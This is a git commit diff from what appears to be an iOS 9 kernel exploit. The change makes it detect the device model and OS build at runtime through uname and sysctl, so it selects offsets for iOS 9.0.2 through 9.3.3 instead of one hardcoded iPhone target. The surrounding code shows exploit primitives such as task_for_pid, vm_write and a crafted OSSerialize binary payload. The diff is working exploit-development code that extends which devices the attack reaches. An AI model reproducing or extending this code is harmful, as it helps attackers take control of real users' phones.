fix offset detection
parent
2e91ec1495
commit
981b527692
|
@ -22,6 +22,8 @@
|
||||||
#include <netinet/in.h>
|
#include <netinet/in.h>
|
||||||
#include <arpa/inet.h>
|
#include <arpa/inet.h>
|
||||||
|
|
||||||
|
#include <sys/utsname.h>
|
||||||
|
|
||||||
#include <mach/mach.h>
|
#include <mach/mach.h>
|
||||||
|
|
||||||
#include <IOKit/IOKitLib.h>
|
#include <IOKit/IOKitLib.h>
|
||||||
|
@ -3614,9 +3616,8 @@ void init_exploit(void * dlsym_addr, void * dlopen_addr)
|
||||||
DLSYM_FUNC(setreuid, libsystem, int, uid_t ruid, uid_t euid);
|
DLSYM_FUNC(setreuid, libsystem, int, uid_t ruid, uid_t euid);
|
||||||
DLSYM_FUNC(getuid, libsystem, uid_t);
|
DLSYM_FUNC(getuid, libsystem, uid_t);
|
||||||
|
|
||||||
DLSYM_FUNC(posix_spawn, libsystem, int, pid_t *pid, const char *path, const posix_spawn_file_actions_t *file_actions, const posix_spawnattr_t *attrp, char *const argv[], char *const envp[]);
|
DLSYM_FUNC(uname, libsystem, int, struct utsname *buf);
|
||||||
DLSYM_FUNC(system, libsystem, int, char*);
|
DLSYM_FUNC(sysctl, libsystem, int, int *name, u_int namelen, void *oldp, size_t *oldlenp, void *newp, size_t newlen);
|
||||||
DLSYM_FUNC(waitpid, libsystem, pid_t, pid_t pid, int *status, int options);
|
|
||||||
|
|
||||||
DLSYM_FUNC(task_for_pid, libsystem, kern_return_t, mach_port_name_t target_tport, int pid, mach_port_name_t *t);
|
DLSYM_FUNC(task_for_pid, libsystem, kern_return_t, mach_port_name_t target_tport, int pid, mach_port_name_t *t);
|
||||||
DLSYM_FUNC(vm_write, libsystem, kern_return_t, vm_map_t target_task, vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt);
|
DLSYM_FUNC(vm_write, libsystem, kern_return_t, vm_map_t target_task, vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt);
|
||||||
|
@ -3630,8 +3631,48 @@ void init_exploit(void * dlsym_addr, void * dlopen_addr)
|
||||||
DLSYM_FUNC(unlink, libsystem, int, const char* file);
|
DLSYM_FUNC(unlink, libsystem, int, const char* file);
|
||||||
|
|
||||||
// Init
|
// Init
|
||||||
/*// TODO fix*/
|
struct utsname systeminfo;
|
||||||
target_environment = info_to_target_environment("iPhone5,3", "9.3.2");
|
uname_func(&systeminfo);
|
||||||
|
|
||||||
|
debug_print("Found device: %s\n", systeminfo.machine);
|
||||||
|
|
||||||
|
char osname[32];
|
||||||
|
size_t s = sizeof(osname);
|
||||||
|
int cmd[2] = { CTL_KERN, KERN_OSVERSION };
|
||||||
|
if(sysctl_func(cmd, sizeof(cmd) / sizeof(*cmd), osname, &s, NULL, 0) != 0) {
|
||||||
|
debug_print("%s\n", "Could not detect device version");
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
bool pre91 = false;
|
||||||
|
const char* osversion = 0;
|
||||||
|
debug_print("Found version: %s\n", osname);
|
||||||
|
if (osname[2] == 'A') {
|
||||||
|
osversion = "9.0.2";
|
||||||
|
pre91 = true;
|
||||||
|
} else if (osname[2] == 'B') {
|
||||||
|
osversion = "9.1";
|
||||||
|
} else if (osname[2] == 'C') {
|
||||||
|
osversion = "9.2";
|
||||||
|
} else if (osname[2] == 'D') {
|
||||||
|
osversion = "9.2.1";
|
||||||
|
} else if (osname[2] == 'E') {
|
||||||
|
osversion = "9.3";
|
||||||
|
} else if (osname[2] == 'F') {
|
||||||
|
osversion = "9.3.2";
|
||||||
|
} else if (osname[2] == 'G') {
|
||||||
|
osversion = "9.3.3";
|
||||||
|
} else {
|
||||||
|
debug_print("%s\n", "Unsupported version");
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
debug_print("Guessed version for offsets: %s\n", osversion);
|
||||||
|
target_environment = info_to_target_environment(systeminfo.machine, osversion);
|
||||||
|
if (!target_environment) {
|
||||||
|
debug_print("%s\n", "Unsupported version");
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
const char *lock_last_path_component = "/tmp/lock";
|
const char *lock_last_path_component = "/tmp/lock";
|
||||||
char *home = getenv_func("HOME");
|
char *home = getenv_func("HOME");
|
||||||
|
@ -3740,7 +3781,6 @@ void init_exploit(void * dlsym_addr, void * dlopen_addr)
|
||||||
memcpy_func(data, kOSSerializeBinarySignature, sizeof(kOSSerializeBinarySignature));
|
memcpy_func(data, kOSSerializeBinarySignature, sizeof(kOSSerializeBinarySignature));
|
||||||
bufpos = sizeof(kOSSerializeBinarySignature);
|
bufpos = sizeof(kOSSerializeBinarySignature);
|
||||||
|
|
||||||
bool pre91 = false;
|
|
||||||
|
|
||||||
WRITE_IN(data, kOSSerializeDictionary | kOSSerializeEndCollecton | 0x10);
|
WRITE_IN(data, kOSSerializeDictionary | kOSSerializeEndCollecton | 0x10);
|
||||||
if (pre91)
|
if (pre91)
|
||||||
|
|
Loading…
Reference in New Issue